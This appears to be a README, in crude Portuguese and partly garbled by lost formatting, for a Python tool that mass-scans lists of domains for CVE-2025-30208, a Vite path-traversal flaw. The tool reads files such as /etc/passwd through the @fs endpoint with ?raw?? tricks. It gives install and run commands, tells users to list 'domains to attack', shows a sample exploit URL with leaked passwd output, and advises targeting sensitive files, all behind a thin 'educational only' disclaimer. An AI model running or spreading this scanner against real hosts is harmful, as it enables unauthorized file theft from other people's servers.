
CVE-2025-30208 ViteVulnScanner
E aí, esse é um script Python multi-thread foda do keklick1337 pra caçar domínios vulneráveis ao CVE-2025-30208 no Vite. Basicamente, ele verifica se você pode pegar arquivos aleatórios via o endpoint @fs com ?raw?? ou ?import&raw?? — tipo vazamento de /etc/passwd e outras paradas suculentas. Ele tem um filtro esperto de falsos positivos pra não perder tempo com merda, além de opções pra ajustar como ele cospe os resultados.
<head> e <body> a menos que pareça legítimo.sourcemappingurl ou export default pra confirmar a parada boa.results_good.txt, results_maybe_good.txt, results_bad.txt).-u se você curte isso.requestsurllib3git clone https://github.com/keklick1337/CVE-2025-30208-ViteVulnScanner.git
cd CVE-2025-30208-ViteVulnScanner
pip install requests urllib3
path_list.txt: Caminhos pra verificar, um por linha (ex.: /etc/passwd).domains.txt: Domínios pra atacar, um por linha (ex.: example.com).Roda assim:
python3 CVE-2025-30208.py <domains_file> [opções]
<domains_file>: Sua lista de domínios (sem arquivo, sem scan, óbvio).-t, --threads: Quantas threads soltar (padrão: 10).-p, --protocol: Forçar http ou https, ou não usar pra ambos.-u, --urls: Colocar URLs vulneráveis na saída.-o, --output: Nome base pros arquivos (padrão: results).-f, --format: txt pra arquivos separados ou jsonl pra um arquivão só (padrão: txt).python3 CVE-2025-30208.py domains.txt
python3 CVE-2025-30208.py domains.txt -t 20 -u -f jsonl
python3 CVE-2025-30208.py domains.txt -t 5 -p https
-f txt)results_good.txt: Coisas que tão definitivamente fodidas (tem sourcemappingurl ou export default).results_maybe_good.txt: Pode ser vulnerável, mas sem prova concreta.results_bad.txt: Limpo, sem estresse.-u e as URLs são anexadas com uma tabulação (\t).results_good.txt com -u:example.com https://example.com/@fs/etc/passwd?raw??
-f jsonl)results_good.jsonl, results_maybe_good.jsonl, results_bad.jsonl.domain: O que você escaneou.status: VULNERABLE, MAYBE VULNERABLE ou BAD.url (se -u): Onde tá fudido.response: O que o servidor cuspiu.results_good.jsonl:{"domain": "example.com", "status": "VULNERABLE", "url": "https://example.com/@fs/etc/passwd?raw??", "response": "root:x:0:0:root:/root:/bin/bash"}
/1e4c911a3fd2244596863ddbfa6f3600/7970621079b41658dcd6c205640b3602/fake).<head> e <body>, é furada — o servidor só tá sendo otário.path_list.txt com @fs/<path>?raw?? e ?import&raw??.<head> e <body>? Pula essa merda.sourcemappingurl ou export default? Bum, GOOD.MAYBE_GOOD.urllib3.disable_warnings()), então não reclama de certificados. Cuidado aí.path_list.txt pros seus alvos — arquivos sensíveis são o verdadeiro negócio.Escuta aqui: essa porra é só pra fins educacionais, parceiro. Não sou responsável se você foder algo, for pego ou irritar alguém com isso. Use pra aprender, não pra ser um idiota. Todos os riscos são seus, nahuy — eu só tô soltando o código.
Tem ideias? Achou um bug? Manda ver com issues ou pull requests. Mais maneiras de matar falsos positivos ou funcionalidades iradas? Vamos deixar essa fera ainda mais doida.
BAD